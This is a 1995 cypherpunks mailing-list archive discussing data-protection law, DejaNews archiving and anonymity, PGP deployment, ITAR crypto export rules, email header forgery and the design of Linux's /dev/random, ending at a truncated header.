Date: Tue, 7 Nov 1995 05:13:09 +0800
To: frantz@netcom.com (Bill Frantz)
Subject: Re: Credentials Without Identity
In-Reply-To: <199511061951.LAA14798@netcom5.netcom.com>
Message-ID: <9511062041.AA15494@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>At 13:35 11/5/95 +0100, Mats Bergstrom wrote:
>>This applies very much so in Sweden too. It *is* illegal to maintain any
>>database with 'information on persons' (like their email addresses) without
>>approval from the Data Inspection. But it's an open secret that this law
>>is broken on a massive front and no bureaucrat is really trying to uphold it.

>So the address book I keep in my hip pocket is illegal!

Not in the UK, any database maintained on a computer system is
covered under the act. Manual records are not. This distinction
is made because a group of senior conservative party members
and supporters finance a group who keep records of "political
disidents". These are available - for a fee for ue in checking
employees before giving them jobs.

Personally I think that this type of behaviour is unacceptable
in a democracy and that it demonstrates the arrogance of power.
I also think it falls plum center in the concerns of this group.
Should such groups be allowed to buy details of our spending 
habits from supermarkets? 


The UK law essentially means that data gathered for one pupose
may not be used for another. purpose without permission. It is
entirely OK to have an address book of email addresses for the
purpose of sending them mail.


	Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 7 Nov 1995 12:49:45 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: "The Policeman Inside"
In-Reply-To: <acc2319202021004e8ac@[205.199.118.202]>
Message-ID: <199511070019.QAA27707@netcom18.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


TCM:

>Even if one believes taxes are "the price paid for civilization," there are
>superior alternatives to the current system. (My current favorite is:
>mandatory slavery for X days per year, regardless of age or ability.
>Instead of taxes, everyone works one day in five, or 2 months out of the
>year, etc., for the herd. Building roads, picking up trash, administering
>computers, etc. There are "lots of issues," but even I agree this list is
>not the best place to discuss it; I mention it in passing.)

good lord!! a kindler, gentler TCM!! a closet socialist!!

this does NOT sound like something I would read from the founder of
cryptoanarchy.

what is cyberspace coming to?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Tue, 7 Nov 1995 12:36:15 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: DejaNews all over again--a URL for Usenet Searching
In-Reply-To: <acc3adfa0702100476eb@[205.199.118.202]>
Message-ID: <Pine.3.89.9511061651.D23552-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain


Synchronicity at work.

On Mon, 6 Nov 1995, Timothy C. May wrote:

> http://dejanews.com/
> 
> It allows searching of Usenet archives (a few months' worth, from what I
> can see).

It's extremely funny that you of all people should post this Tim, as your
tcmay@got.net address was the first thing I ran a search on when I 
discovered this site. 

Judging by the amount of posting you do here, I was surprised that I only
got 36 listings on your new address (1/3 of which quoted you but not 
directly written by you). Either you post more to alt, soc and talk (which they 
don't have) or you use a third address (the second thing I tried was 
tcmay@netcom.com, even less, though the archive's pretty recent, so that's
expected).

Hmm, so you know insiders at Apple and recently held around $65,000 of their 
stock and sold off, saving around $12k in the process after being tipped 
off? Hmmm... (from rec.investment or something along those lines. Want me
to repost your original article? heheheh. <insert evil smile>)

I figured I'd send this to you as a private note, but then I figured 
this thing really is scary and has a lot to do with anonymity. 
Watch out folks. Litte Brother is saving everything you've ever said on 
usenet. Your old posts just won't go away. 

(Not that someone who is so open in his views and true name as yourself 
would mind, Tim, but I'm certainly happy for my sake, that alt isn't archived 
yet. It's bad enough they have rec.)

Ps. I will of course run searches on every other address that the who
command on majordomo@toad.com supplies me with, so watch what you say 
ladies, gents and otherwise. ;->
Get those 'nyms ready.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cme@acm.org
Date: Tue, 7 Nov 1995 07:27:35 +0800
To: cypherpunks@toad.com
Subject: GAK criteria
Message-ID: <9511062204.AA02788@tis.com>
MIME-Version: 1.0
Content-Type: text/plain



 http://csrc.ncsl.nist.gov/keyescrow/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: James Black <black@eng.usf.edu>
Date: Tue, 7 Nov 1995 11:55:32 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: re:using PGP only for digital signatures
In-Reply-To: <199511062107.NAA29648@ix5.ix.netcom.com>
Message-ID: <Pine.SUN.3.91.951106170359.15489A-100000@armstrong>
MIME-Version: 1.0
Content-Type: text/plain


Hello,

On Mon, 6 Nov 1995, Bill Stewart wrote:

> At 04:12 PM 11/4/95 -0500, James Black <black@eng.usf.edu> wrote:

> Somebody else has brought up the insecurity of using security software
> on multi-user machines, where the system administrator or anybody who cracks
> root can steal your passphrases and even replace the trustable software with
> trojan-horse versions; your students will be safer if they only trust stuff
> running on PCs from software they've verified themselves.  But you can at least
> do signature-checking safely on a multi-user machine if the software is
> protected adequately.

  I brought up the security issue with the administrator that I am 
talking with, about the implementation of PGP as it looks like it will go 
through all the hurdles.  The last difficulty is that we have a student 
that has an account here, but he is actually overseas (so we will have 
two copies of PGP, and he will use the international one, not the US 
one).  The security issue is important.  Part of that is that most users 
use dumb terminals, so any programs ran will be done on remote servers.  
My solution (until I get a better idea) is to just write a mail program 
that can check the hash value (I think that is the term) of the PGP 
executable, compare it against the one that it created originally and use 
it, only if they are the same.  The user can also request the number, and 
write it down for his own personal comparisons.   The program will also 
automatically encrypt, if it finds the public key on the user's keyring, 
or the universities keyring.  I will now check on how secure the LAN 
network is, as I am a student and I want to know that the system is 
safe.  She (the administrator) felt that if it is safe against people 
getting into accounts it should be safe, but if I my signature is on a 
document, then people will believe that it is from me (until I state 
otherwise), and that could be more damaging than getting into my account.
  Well, I am looking into the security side, since the legal issues are 
pretty much done with (IMOHO).  If anyone has any brilliant ideas as to 
how to run PGP on a multi-user network utilitizing dumb terminals so it 
can be transparent I am interested in options.
  Well, take care and have fun, and I will look for RIPEM (I think that 
was the name) and see if that will be adequate, at the moment.

James Black
black@suntan.eng.usf.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Damaged Justice <frogfarm@yakko.cs.wmich.edu>
Date: Tue, 7 Nov 1995 12:00:44 +0800
To: gimonca@mirage.skypoint.com (Charles Gimon)
Subject: Re: DejaNews all over again
In-Reply-To: <m0tCZ3A-0005LoC@skypoint.com>
Message-ID: <199511062222.RAA14762@yakko.cs.wmich.edu>
MIME-Version: 1.0
Content-Type: text/plain



My two cents: I've used Dejanews for almost a month now, and have been
consistently impressed with the results. The uses are many; the danger,
as others have noted, is that people forget (or never realize in the
first place) that you should never post anything to Usenet that you
wouldn't want to see plastered on the evening news.

Having said that, I'm greatly looking forward to the impending addition
of the alt.* groups to their archives. Everyone is indeed a Kibo now,
and the general public has become more aware of the need for reputations
as a result.

--
 http://yakko.cs.wmich.edu/~frogfarm  ..for the best in unapproved information
  EmmaGoldmanCamillePagliaMarieCurieAynRandSapphoDianaToriAmosPJHarvey&Demona
 Living in dread with your fragile brain and the executioner's got your number
 I feel a groove comin' on                              Freedom...yeah, right.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Tue, 7 Nov 1995 03:09:20 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: So much for free speech...[noise?]
In-Reply-To: <acc37a5b03021004553e@[205.199.118.202]>
Message-ID: <9511061846.AA21160@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain


"Freedom shall stops where starts the one of the others"
That's what I learned, and what I think it is a "good thing",
Thus, your freedom of speach shall stops where it starts hurting
people

[not that I support at all the childish way l^Hamericans sue everybody
for anything, but I am happy that racists saying are not allowed and
can be condamned in France.]

dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

class struggle domestic disruption Kennedy bomb Saddam Hussein Peking
 Kaser Sose




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tien@well.sf.ca.us (Lee Tien)
Date: Tue, 7 Nov 1995 11:31:00 +0800
To: cypherpunks@toad.com
Subject: forging headers
Message-ID: <199511070249.SAA14921@well.com>
MIME-Version: 1.0
Content-Type: text/plain


So I got this message.  How would someone identify the sender of this
message?  I'm writing an article on anonymity, with some discussion of
remailers, and want to argue that forging already permits people to raise
the costs of tracing significantly, anonymous remailers or no.  

Lee

>From: freeh@fbi.gov
>Date: Tue, 24 Oct 95 16:07:08 -0400
>Apparently-To: tien@well.sf.ca.us
>X-UIDL: 814570964.056
>
>> How difficult is it to forge headers?  How difficult is it to trace a
>> message to the actual sender if the header is forged?
>
>Not very difficult at all (to forge, that is).  This is a quick and dirty
>example that should be somewhat traceable.  If you want pointers on how to
>trace it, post the whole thing, including headers, to cypherpunks.
>
>Louis
>
>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 7 Nov 1995 12:04:43 +0800
To: Stephen Whitaker <cypherpunks@toad.com
Subject: Re: toolkits?
Message-ID: <acc407190e0210046725@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:41 AM 11/7/95, Stephen Whitaker wrote:
>OK folks, nobody seems to have any ideas how to keep our little state of
>Vermont from falling prey to mediocrity in the internet. I thought with so
>many highly opinionated people I would at least get a few good or at least
>entertaining suggestions.

You may have gotten no responses because it generally is not up to a state
government to ensure that "mediocrity" in the Internet is avoided (though
I'm not sure what is meant by "mediocrity." If it is security and
anonymity, this is definitely the state government's responsibility, or
even area of interest.)


>just might have a prayer of doing it right, whatever that is. What would it
>look like if secure communications and anonomynity were designed in from the
>start? Is this what Sameer is doing in Bezerkeley?
>
>What machines are considered minimum requirements to use these tools? What
>are the essential reference works?

"Security and anonymity" are not matters for government to ensure.

Imagine two Vermont residents, Bob of Burlington and Rhonda of Rutland. The
wish to communicate securely, and perhaps anonymously. Alas, the state
legislature in Montpelier is oblivious to their concerns, not even
answering their e-mail. What, oh what, are they to do?

Not to worry, as what Vermont does is irrelevant. Bob of Burlington can
encrypt his messages to Rhonda of Rutland and send them in any number of
ways. Compuserve, AOL, and (probably) Netcom will have local access points.


Happily, Rhonda of Rutland and Bob of Burlington (not their real names) can
communicate secretly, securely, and anonymously.

I urge you, Stephen, to read up on encryption and the benefits contained
therein. Looking to your state capital to secure your communications is a
lose.


--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Tue, 7 Nov 1995 12:14:19 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Exporting software doesn't mean exporting (was: Re: lp ?)
In-Reply-To: <199511061924.OAA14371@jekyll.piermont.com>
Message-ID: <m0tCcXa-0004JWC@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


"Perry E. Metzger" writes:

: 
: "Peter D. Junger" writes:
: > "Perry E. Metzger" writes:
: > : It isn't clear that telecoms treaties don't implicitly make this legal
: > : in spite of the export regulations.
: > 
: > Once again, what the ITAR forbid is the disclosure of cryptographic
: > software to a foreign person within or without the United States, so
: > it does not make any difference whether the message containing the
: > code passes through the United States or not.
: 
: I understand that you are a lawyer and I'm not, but it is my
: understanding that international treaties come in to play on this sort
: of thing. For instance, in international shipments, you can transship
: items and substances that are illegal to possess in a country through
: its ports provided that the materials do not originate or terminate
: their shipment in the country and remain sealed in their containers
: throughout. It is also my understanding that items like mail and phone
: calls that happen to transit a country are not necessarily subject to
: that nations laws provided that the nation is not a terminal point for
: the mail or call or what have you.

The trouble is that the ITAR's definition of export that is relevant
to cryptographic software has nothing to do with exporting in the
normal sense, and therefore it has nothing to do with transhipments.

The definition of export that is relevant simply makes it a felony to
disclose  technical data, which is defined as including cryptographic
software, to a foreign person within or without the United States.
Thus I cannot disclose my materials for my course in Computers and the
Law, which include some cryptographic software, to a Canadian student
in the United States without getting a license, event though there is
an exception which would allow me to export the software to Canada.

It doesn't make any difference whether the disclosure--or the message
that makes the disclosure possible--passes through a foreign
jurisdiction or not.  It is the disclosure, and only the disclosure,
that requires the license.  Not the transmission of the message.

Don't blame this on my being a lawyer; blame it on some very sick
people in the Office of Defense Trade Controls and in the NSA.

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Theodore Ts'o" <tytso@MIT.EDU>
Date: Tue, 7 Nov 1995 12:18:42 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: /dev/random - using up entropy?
In-Reply-To: <199511042352.PAA07554@ix4.ix.netcom.com>
Message-ID: <9511070110.AA07972@dcl.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain


   Date: Sat, 04 Nov 1995 15:52:03 -0800
   From: Bill Stewart <stewarts@ix.netcom.com>

   So that says you use up m bits of entropy if you get m bits of good output.

   However, what I'd like to suggest is that you don't, from the perspective
   of a user who doesn't have direct access to the reservoir R of random bits.
   For that user, p(X|H(R)=O) is the same as p(X) or P(X|H(R)=O'), because
   the user is neither able to invert H, nor to enumerate all possible R,
   nor to calculate anything useful based on multiple outputs, since the
   reservoir R is shuffled between outputs; even a simple circular shift
   may be enough.   This doesn't apply to the case where n is 32 or 48
   and the hash function produces n-bit outputs, or even m<<n bit outputs,
   because that maybe be inverted or brute-forced, but it seems to apply
   for the case where n is sufficiently large and the hash is good.
   If the hash is simpler than MD5, it may apply anyway, since the hash
   produces far fewer bits than its input, as long as the hash and the
   mixing function don't give away any information about the reservoir
   between successive outputs.

All of this assumes that MD5 or SHA, or whatever, is a "good hash
function".  Unfortunately, this strikes at the heart of "what we don't
know" about writing good hash functions, which is still today much more
of an art rather than a science.

So the conservative among us will probably not want to count on this
fact when generating long-term, valuable secrets, like public/private
keypairs

   This would suggest that /dev/random ought to have a mode that says
   "give me output of whatever quality you have available",
   and that it ought to be OK to use it, as long as the reservoir has 
   been seeded with sufficient high-entropy input to have decent randomness.

Yup; in the Linux implementation which I've done, that's what the
/dev/urandom device is all about.  For most purposes, it's *probably*
good enough.  However, I would character it as numbers which are
"cryptogrphically random", as opposed to "truely random", in that they
depend on the intractibility of MD5 towards analysis.  One can imagine
descending scale of "quality of random numbers" where physically
generated random numbers would best, followed by /dev/random numbers,
followed by /dev/urandom numbers.  It may be that /dev/urandom is just
as hard as /dev/random --- but given the our current knowledge, it's
impossible to prove one way or the other.  

						- Ted

P.S.  Here's the header from my current /dev/random driver, if people
are interested:

/*
 * random.c -- A strong random number generator
 *
 * Version 0.95, last modified 4-Nov-95
 * 
 * Copyright Theodore Ts'o, 1994, 1995.  All rights reserved.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 * 1. Redistributions of source code must retain the above copyright
 *    notice, and the entire permission notice in its entirety,
 *    including the disclaimer of warranties.
 * 2. Redistributions in binary form must reproduce the above copyright
 *    notice, this list of conditions and the following disclaimer in the
 *    documentation and/or other materials provided with the distribution.
 * 3. The name of the author may not be used to endorse or promote
 *    products derived from this software without specific prior
 *    written permission.
 * 
 * ALTERNATIVELY, this product may be distributed under the terms of
 * the GNU Public License, in which case the provisions of the GPL are
 * required INSTEAD OF the above restrictions.  (This clause is
 * necessary due to a potential bad interaction between the GPL and
 * the restrictions contained in a BSD-style copyright.)
 * 
 * THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED
 * WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
 * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
 * DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT,
 * INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
 * (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
 * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
 * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
 * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
 * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
 * OF THE POSSIBILITY OF SUCH DAMAGE.
 */

/*
 * (now, with legal B.S. out of the way.....) 
 * 
 * This routine gathers environmental noise from device drivers, etc.,
 * and returns good random numbers, suitable for cryptographic use.
 * Besides the obvious cryptographic uses, these numbers are also good
 * for seeding TCP sequence numbers, and other places where it is
 * desireable to have numbers which are not only random, but hard to
 * predict by an attacker.
 *
 * Theory of operation
 * ===================
 * 
 * Computers are very predictable devices.  Hence it is extremely hard
 * to produce truely random numbers on a computer --- as opposed to
 * pseudo-random numbers, which can easily generated by using a
 * algorithm.  Unfortunately, it is very easy for attackers to guess
 * the sequence of pseudo-random number generators, and for some
 * applications this is not acceptable.  So instead, we must try to
 * gather "environmental noise" from the computer's environment, which
 * must be hard for outside attackers to observe, and use that to
 * generate random numbers.  In a Unix environment, this is best done
 * from inside the kernel.
 * 
 * Sources of randomness from the environment include inter-keyboard
 * timings, inter-interrupt timings from some interrupts, and other
 * events which are both (a) non-deterministic and (b) hard for an
 * outside observer to measure.  Randomness from these sources are
 * added to an "entropy pool", which is mixed using a CRC-like function.
 * This is not cryptographically strong, but it is adequate assuming
 * the randomness is not chosen maliciously, and it is fast enough that
 * the overhead of doing it on every interrupt is very reasonable.
 * As random bytes are mixed into the entropy pool, the routines keep
 * an *estimate* of how many bits of randomness have been stored into
 * the random number generator's internal state.
 * 
 * When random bytes are desired, they are obtained by taking the MD5
 * hash of the contents of the "entropy pool".  The MD5 hash avoids
 * exposing the internal state of the entropy pool.  It is believed to
 * be computationally infeasible to derive any useful information
 * about the input of MD5 from its output.  Even if it is possible to
 * analyze MD5 in some clever way, as long as the amount of data
 * returned from the generator is less than the inherent entropy in
 * the pool, the output data is totally unpredictable.  For this
 * reason, the routine decreases its internal estimate of how many
 * bits of "true randomness" are contained in the entropy pool as it
 * outputs random numbers.
 * 
 * If this estimate goes to zero, the routine can still generate
 * random numbers; however, an attacker may (at least in theory) be
 * able to infer the future output of the generator from prior
 * outputs.  This requires successful cryptanalysis of MD5, which is
 * not believed to be feasible, but there is a remote possiblility.
 * Nonetheless, these numbers should be useful for the vast majority
 * of purposes.
 * 
 * Exported interfaces ---- output
 * ===============================
 * 
 * There are three exported interfaces; the first is one designed to
 * be used from within the kernel:
 *
 * 	void get_random_bytes(void *buf, int nbytes);
 *
 * This interface will return the requested number of random bytes,
 * and place it in the requested buffer.
 * 
 * The two other interfaces are two character devices /dev/random and
 * /dev/urandom.  /dev/random is suitable for use when very high
 * quality randomness is desired (for example, for key generation or
 * one-time pads), as it will only return a maximum of the number of
 * bits of randomness (as estimated by the random number generator)
 * contained in the entropy pool.
 * 
 * The /dev/urandom device does not have this limit, and will return
 * as many bytes as are requested.  As more and more random bytes are
 * requested without giving time for the entropy pool to recharge,
 * this will result in random numbers that are merely cryptographically
 * strong.  For many applications, however, this is acceptable.
 *
 * Exported interfaces ---- input
 * ==============================
 * 
 * The current exported interfaces for gathering environmental noise
 * from the devices are:
 * 
 * 	void add_keyboard_randomness(unsigned char scancode);
 * 	void add_mouse_randomness(__u32 mouse_data);
 * 	void add_interrupt_randomness(int irq);
 * 	void add_blkdev_randomness(int irq);
 * 
 * add_keyboard_randomness() uses the inter-keypress timing, as well as the
 * scancode as random inputs into the "entropy pool".
 * 
 * add_mouse_randomness() uses the mouse interrupt timing, as well as
 * the reported position of the mouse from the hardware.
 *
 * add_interrupt_randomness() uses the inter-interrupt timing as random
 * inputs to the entropy pool.  Note that not all interrupts are good
 * sources of randomness!  For example, the timer interrupts is not a
 * good choice, because the periodicity of the interrupts is to
 * regular, and hence predictable to an attacker.  Disk interrupts are
 * a better measure, since the timing of the disk interrupts are more
 * unpredictable.
 * 
 * add_blkdev_randomness() times the finishing time of block requests.
 * 
 * All of these routines try to estimate how many bits of randomness a
 * particular randomness source.  They do this by keeping track of the
 * first and second order deltas of the event timings.
 *
 * Acknowledgements:
 * =================
 *
 * Ideas for constructing this random number generator were derived
 * from the Pretty Good Privacy's random number generator, and from
 * private discussions with Phil Karn.  Colin Plumb provided a faster
 * random number generator, which speed up the mixing function of the
 * entropy pool, taken from PGP 3.0 (under development).  It has since
 * been modified by myself to provide better mixing in the case where
 * the input values to add_entropy_word() are mostly small numbers.
 * 
 * Any flaws in the design are solely my responsibility, and should
 * not be attributed to the Phil, Colin, or any of authors of PGP.
 * 
 * The code for MD5 transform was taken from Colin Plumb's
 * implementation, which has been placed in the public domain.  The
 * MD5 cryptographic checksum was devised by Ronald Rivest, and is
 * documented in RFC 1321, "The MD5 Message Digest Algorithm".
 * 
 * Further background information on this topic may be obtained from
 * RFC 1750, "Randomness Recommendations for Security", by Donald
 * Eastlake, Steve Crocker, and Jeff Schiller.
 */






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Tue, 7 Nov 1995 14:19:28 +0800
To: Damaged Justice <frogfarm@yakko.cs.wmich.edu>
Subject: Re: DejaNews all over again
In-Reply-To: <199511062222.RAA14762@yakko.cs.wmich.edu>
Message-ID: <Pine.ULT.3.91.951106203817.19364A-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 6 Nov 1995, Damaged Justice wrote:

> My two cents: I've used Dejanews for almost a month now, and have been
> consistently impressed with the results. The uses are many; the danger,
> as others have noted, is that people forget (or never realize in the
> first place) that you should never post anything to Usenet that you
> wouldn't want to see plastered on the evening news.
> 
> Having said that, I'm greatly looking forward to the impending addition
> of the alt.* groups to their archives. Everyone is indeed a Kibo now,
> and the general public has become more aware of the need for reputations
> as a result.

I absitively agree. I have no quarrel with archiving and redistributing 
public information. I think it's great.

Might also help spread aewareness of the anonymity options available. It 
would be good to see if the dejanews folks would give the anon servers a 
plug. Anybody friendly with them?

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stephen Whitaker <whitaker@sover.net>
Date: Tue, 7 Nov 1995 11:02:27 +0800
To: cypherpunks@toad.com
Subject: toolkits?
Message-ID: <199511070141.UAA15583@maple.sover.net>
MIME-Version: 1.0
Content-Type: text/plain


OK folks, nobody seems to have any ideas how to keep our little state of
Vermont from falling prey to mediocrity in the internet. I thought with so
many highly opinionated people I would at least get a few good or at least
entertaining suggestions.

How about a different angle. Can anyone aid in building capacity among a few
sincere watchdog types to really learn how to map, trace and test the net
here as it grows?
What constitutes a basic toolkit for trace route, sniff for promiscuous
mode, all the other tools to map whats happening to net traffic in a little
state of 1/2 million people? What are the sources of traffic information?
With there not even a single DS-3 in the state yet carrying IP it seems we
just might have a prayer of doing it right, whatever that is. What would it
look like if secure communications and anonomynity were designed in from the
start? Is this what Sameer is doing in Bezerkeley?

What machines are considered minimum requirements to use these tools? What
are the essential reference works?
-sw





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Tue, 7 Nov 1995 15:05:22 +0800
To: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Subject: Re: Exporting software doesn't mean exporting (was: Re: lp ?)
In-Reply-To: <m0tCcXa-0004JWC@pdj2-ra.F-REMOTE.CWRU.Edu>
Message-ID: <Pine.SOL.3.91.951106202632.8543C-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 6 Nov 1995, Peter D. Junger wrote:

> 
> Don't blame this on my being a lawyer; blame it on some very sick
> people in the Office of Defense Trade Controls and in the NSA.

I think it's unfair to call the people at the ODTC and the NSA sick; 
during the cold war, such restrictions did make some sense; in 
particular, controlling the export of high-performance encryption 
hardware does make it harder for other countries to deploy ubiquitous 
strong encryption, particularly in the less developed countries, and 
particulalry for chips that required exotic fabrication (the soviet union 
never had really good mass-production facilities). 

Controlling software encryption without controlling publication never
seemed to make that much sense, except that the lack of ubiquitous
encryption probably allowed for lots of  realatively non-sensitive 
intercepts that might otherwise have been impossible, and which may have 
been useful fuel for analysts. 

 However, now that the cold war is over, and now that fab plants are
sprouting up all over the world, these restrictions make a lot less sense
than they used to. Their main consequence is to restrict the deployment of
strong cryptography world wide, including the United States. Strangely
enough this would seem to hurt, not help, the NSA in the most important
part of their current mission, which is to help protect US industry
against industrial espionage and virtual terrorism, which is a far more
pressing threat. 

It's time for the policy makers at the NSA and GCHQ to realise that they
won the war, give the appropriate people OBEs and knighthoods, allow the
GCHQ to rejoin the civil service unions and apologise for the insult to
their patriotism of their forcible de-unionisation, and above all,
concentrate on fighting the real enemy - The French :-)

Simon // Wow! Did I really just write all that. Next thing you know, all 
      // be saying sometime nice about Netscape.

p.s.
 
   I would expect the incoming Labour government to remove the ban on
Union membership at GCHQ, with the old guaranteed non-strike agreement. I
wonder how many other similar organisations allow employees to belong to
unions? I'd guess that the Israeli ones would, mainly because I can't
imagine any major Israeli organisation not being unionised :-); I can't
picture the CIA or NSA allowing collective bargaining ("America works 
best when you say Union 0w98bvchgfwer097").





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 7 Nov 1995 13:27:17 +0800
To: cypherpunks@toad.com
Subject: Re: toolkits?
Message-ID: <acc415d311021004dd09@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


The most common typo (of any significance) I seem to make is leaving out
the "not" in a strongly worded statement:

>You may have gotten no responses because it generally is not up to a state
>government to ensure that "mediocrity" in the Internet is avoided (though
>I'm not sure what is meant by "mediocrity." If it is security and
>anonymity, this is definitely the state government's responsibility, or
                               ^
                               not
>even area of interest.)

It's almost as if I'm "leaning on the horn" so much as I'm typing, that I
leave out the all-important "not" modifier.

My apologies.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carolann@censored.org (Censored Girls Anonymous)
Date: Tue, 7 Nov 1995 22:32:16 +0800
To: cypherpunks@toad.com
Subject: Request for URL'S
Message-ID: <199511062033.UAA17159@mailhost1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


I have trebled my WWW site size.
It is now a comfortable 15 megs big.

I'd love to make a Cypherpunk URL page,
so if you will send your five favorite URL's
I'll put them all on a page like The Dreams Page,
(http:www.primenet.com/~carolab/dreams.html)
and turn it loose on the net.

Nov. 15th is when I will edit up the page.

Love Always,

Carol Anne
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 7 Nov 1995 22:36:20 +0800
To: cypherpunks@toad.com
Subject: Re: [NOISE] DejaNews all over again--a URL for Usenet Searching
Message-ID: <acc41c71130210046b0e@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:49 PM 11/6/95, Peter Trei wrote:
>> I usually avoid passing on URLs of interesting sites, in the name of
>> conserving bandwidth (*), but this one really has me jazzed:
>> http://dejanews.com/
>> It allows searching of Usenet archives (a few months' worth, from what I
>> can see).
>
>Unfortunately, it does not archive alt, soc, talk,  or *.binaries (the
>latter is
>probably a blessing). Specialized news grepping is still useful - see
>http://www.iii.net/users/trei/usenet.html for an example.

excite Netsearch (http://www.excite.com/) indexes all or part of alt, soc,
and talk groups. (I say "all or part" because I obviously cannot verify
that it indexes all posts to these groups just by verifying that it indexes
at least _some_ posts in these groups.)

It even indexes the *.binaries.* groups, as I just learned.

(Paul Robichaux told me about the http://www.excite.com/ URL.)

--Tim May


Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shields@tembel.org (Michael Shields)
Date: Tue, 7 Nov 1995 12:22:57 +0800
